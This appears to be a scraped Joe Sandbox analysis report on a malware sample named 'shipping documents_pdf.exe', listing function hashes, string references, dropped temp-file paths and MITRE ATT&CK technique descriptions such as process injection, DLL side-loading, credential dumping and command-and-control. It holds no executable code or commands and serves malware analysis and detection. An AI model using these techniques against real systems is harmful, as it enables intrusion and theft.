Function 02F6BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Resource at %p, xrefs: 02FA7B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02FA7B7F
RTL: Re-Waiting, xrefs: 02FA7BAC

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: a08b39de8a8558ea9383663cfa65ebc69bffaa01948b49f91d2c14b83d1b25f3
Instruction ID: b735a0115d9f78f5169e9bba4a583801c52b5586788d2f42bb93ebc6bef027cc
Opcode Fuzzy Hash: a08b39de8a8558ea9383663cfa65ebc69bffaa01948b49f91d2c14b83d1b25f3
Instruction Fuzzy Hash: BB41C272B017029FD724DE25CC50B6AB7E6EF88794F100A2DEA56EB690D770E405CB91

Function 02F6B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02FA728C

Strings

RTL: Resource at %p, xrefs: 02FA72A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02FA7294
RTL: Re-Waiting, xrefs: 02FA72C1

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 0d0978ebfbf658e7923e1227555eef8363fc950b1854dc01ce2c3e198b00a950
Instruction ID: 4f13794b748ea3020925b1a2aa376555f96a233273bb1358f2ecf983bfb05aa3
Opcode Fuzzy Hash: 0d0978ebfbf658e7923e1227555eef8363fc950b1854dc01ce2c3e198b00a950
Instruction Fuzzy Hash: 3E41E372B00246ABD720DE25CD41F6AB7E5FF54794F100629FA55EB680DB20E802CBD1

Function 02F77D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 02F77E8B

Strings

-, xrefs: 02F77DDD
+, xrefs: 02F77DE8

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction ID: 3ecdf22d0b75ef8fe04d84a217ffeef8b974157756ca3960525641be100de758
Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction Fuzzy Hash: 7D91A371E102169BDB24EE69C980BFEF7A5EF447A4F14461BEA65EB2C0D7309940CB90

Function 02F39126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 02F39191
@, xrefs: 02F39175

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: b0bdf6739e1b32254684ff3fc57de4734b1a6c6b73792b808323c1d2bb16b0aa
Instruction ID: 90893a812f4d401d58cf4182aa6af20c10aa8f3a9d212fe25e064f8e1ef12de3
Opcode Fuzzy Hash: b0bdf6739e1b32254684ff3fc57de4734b1a6c6b73792b808323c1d2bb16b0aa
Instruction Fuzzy Hash: 01810C72D012699BEB31DF54CC44BEEB7B4AF48754F0041EAAA19B7680D7709E84CFA0

Analysis Process: jsmAYDUnVBUZ.exePID: 4928, Parent PID: 2944COMMON

Executed Functions

Function 02A3128A Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3514458968.00000000027A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 027A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_27a0000_jsmAYDUnVBUZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5de32d27f2cfcbb97c2d616ff15c87606148725f6668542021acdcfe7317d102
Instruction ID: 9bd95c8b83745e786cf6004eaf82d572a4b4b23132837f6be4e359597c5c52ce
Opcode Fuzzy Hash: 5de32d27f2cfcbb97c2d616ff15c87606148725f6668542021acdcfe7317d102
Instruction Fuzzy Hash: 263192116593F14ED31E836D08BD675AEC18E5B20174EC2EEDADA5F2E3C4888419D3A5

Function 02A2A480 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3514458968.00000000027A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 027A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_27a0000_jsmAYDUnVBUZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb84f16298fe9d2cb6d06d235799bc15989c8d04a440eefe36d6679f632cf991
Instruction ID: 7b186dbd29a8102d88cc43e5f5b349de9921c6aa2b2d32b352c81d70a64a6391
Opcode Fuzzy Hash: bb84f16298fe9d2cb6d06d235799bc15989c8d04a440eefe36d6679f632cf991
Instruction Fuzzy Hash: E64113B1D11229AFDB04CF99C985AEEBBBDFF48710F10415AFA14E6240E7709641CFA0

Function 02A4EF4A Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3514458968.00000000027A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 027A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_27a0000_jsmAYDUnVBUZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5171df4a00467af48d642d631b6bea6697b097cb8f09c1f24f11d7c82357d79a
Instruction ID: c87576a9fc210047c3def4ea7444fe9c713af14069bb46ecdc9746b3afddeee8
Opcode Fuzzy Hash: 5171df4a00467af48d642d631b6bea6697b097cb8f09c1f24f11d7c82357d79a
Instruction Fuzzy Hash: 38312AB5A00218ABDB14DF58DD81EEFB7B9EF88300F108209F918A3240DB30A9518FA5

Function 02A3E43A Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3514458968.00000000027A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 027A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_27a0000_jsmAYDUnVBUZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ead8ac15d8388dc67f197671c01c22584cbd605e5b50284e633b828eb55c0eff
Instruction ID: 962e1c98fb33bd062f4400937ece2930dcafa5f612137fd28bb65139dc94e494
Opcode Fuzzy Hash: ead8ac15d8388dc67f197671c01c22584cbd605e5b50284e633b828eb55c0eff
Instruction Fuzzy Hash: 911173B27C02057AF7209A559D42FAB375DDB84B20F248415FB08AA2C0EAB5F8114AB5

Function 02A4EBEA Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3514458968.00000000027A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 027A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_27a0000_jsmAYDUnVBUZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f90ba38217abd036676f7050ec7fc0b2e3101cf77b5b8731e5eecc2317744a33
Instruction ID: 4bed2ad2a1aa018146e56e9c940f44ecf69dabb8f1897ddd19b3661ee04ab573
Opcode Fuzzy Hash: f90ba38217abd036676f7050ec7fc0b2e3101cf77b5b8731e5eecc2317744a33
Instruction Fuzzy Hash: B7116071A40214BFE724EF68CC41FAF7369EF89710F008549FD5997280EB7069128BA5

Function 02A4CCAA Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3514458968.00000000027A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 027A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_27a0000_jsmAYDUnVBUZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33aaf940530058ae935a0e07810e98f415bd095f772c11a4f59306b7db9e1daf
Instruction ID: 503ef0008bb9ee5015f500234f62de5df3d4f4963ed0bcfa462ec0c8bebd7839
Opcode Fuzzy Hash: 33aaf940530058ae935a0e07810e98f415bd095f772c11a4f59306b7db9e1daf
Instruction Fuzzy Hash: 491103B6D01218AF9B00DFA9DD419EEB7F9EF48210F10456AED09E7240E7705A04CFA5

Function 02A4FBAA Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3514458968.00000000027A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 027A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_27a0000_jsmAYDUnVBUZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7744d1d2e787bbfa1d118968f16c12ab20d06647d67fd735b7099c4cadecac2c
Instruction ID: 667893e742af59831c733ccdadc2028f8b92caadce62c01cf147e7a6965c3179
Opcode Fuzzy Hash: 7744d1d2e787bbfa1d118968f16c12ab20d06647d67fd735b7099c4cadecac2c
Instruction Fuzzy Hash: E201C0B2214108BBCB04DE99DC90EEB77AEAF8C710F008209FA09E3244D630FD51CBA5

Function 02A4B8DA Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3514458968.00000000027A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 027A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_27a0000_jsmAYDUnVBUZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ac6dd00219ef547b433e9e691fa24b2f47bfac319b8d72f61995f55b2d5dacb
Instruction ID: 49a0b8857b91dfb8359bbbaf421c6d917333c2ee8068aa6c398df073ee25d784
Opcode Fuzzy Hash: 3ac6dd00219ef547b433e9e691fa24b2f47bfac319b8d72f61995f55b2d5dacb
Instruction Fuzzy Hash: 4201D2B2C11219AF9B44DFE8C9405EEBBF9FB58600F14456AD515F2240FB7056048FA5

Function 02A4EE6A Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3514458968.00000000027A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 027A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_27a0000_jsmAYDUnVBUZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c1588f91e8ff1abf33182589e3184d7251b9b21aec0a604e35a48d732004cf2
Instruction ID: 322a0f3aecc5900661d3636239fba5d523109c008f0bae2a6ea567de817e6bbf
Opcode Fuzzy Hash: 7c1588f91e8ff1abf33182589e3184d7251b9b21aec0a604e35a48d732004cf2
Instruction Fuzzy Hash: 0BF08CB6240218BFD710DF89DD81E9B73ADEFC9710F008108F91897241D670BD528BB5

Function 02A4FAEA Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3514458968.00000000027A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 027A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_27a0000_jsmAYDUnVBUZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73b04d06e9cc9d06571c888ae0a9447788f46f96137d8274935dcef2e427ba8d
Instruction ID: c0108a2cee8c6a3a8769ff1ec6fa78ae84a35349f0042e16d6b1e55106c962a2
Opcode Fuzzy Hash: 73b04d06e9cc9d06571c888ae0a9447788f46f96137d8274935dcef2e427ba8d
Instruction Fuzzy Hash: FCE06572240219BFE610EE59DD42E9B73ADEF88710F004418FA08A7281DA70BD108AB8

Function 02A4F7DA Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3514458968.00000000027A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 027A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_27a0000_jsmAYDUnVBUZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35b72566180eabb0bfa8a9aac645b65b65562664edf51f15ac0a20c3acdc79a8
Instruction ID: 52ffc06b0ecf7754cc6bbb51f998fa0d6df54e9946a3fe6db8bd799104602ec6
Opcode Fuzzy Hash: 35b72566180eabb0bfa8a9aac645b65b65562664edf51f15ac0a20c3acdc79a8
Instruction Fuzzy Hash: 58E08C362806147BE220FA6ACC05FDBB76DDFC9711F008415FA0DA7241DA70B9018BF4

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report shipping documents_pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\-2-48L

C:\Users\user\AppData\Local\Temp\ectosphere

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Windows Analysis Report
shipping documents_pdf.exe

Function 00417533 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 0042C393 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Function 02F735C0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Function 02F72B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Function 02F72DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Function 00413D5F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80
threadwindowCOMMON

Function 00413D83 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Function 00413D55 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55
threadwindowCOMMON

Function 0042C6E3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Function 0042C6A3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Function 0042C723 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Function 02F72C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE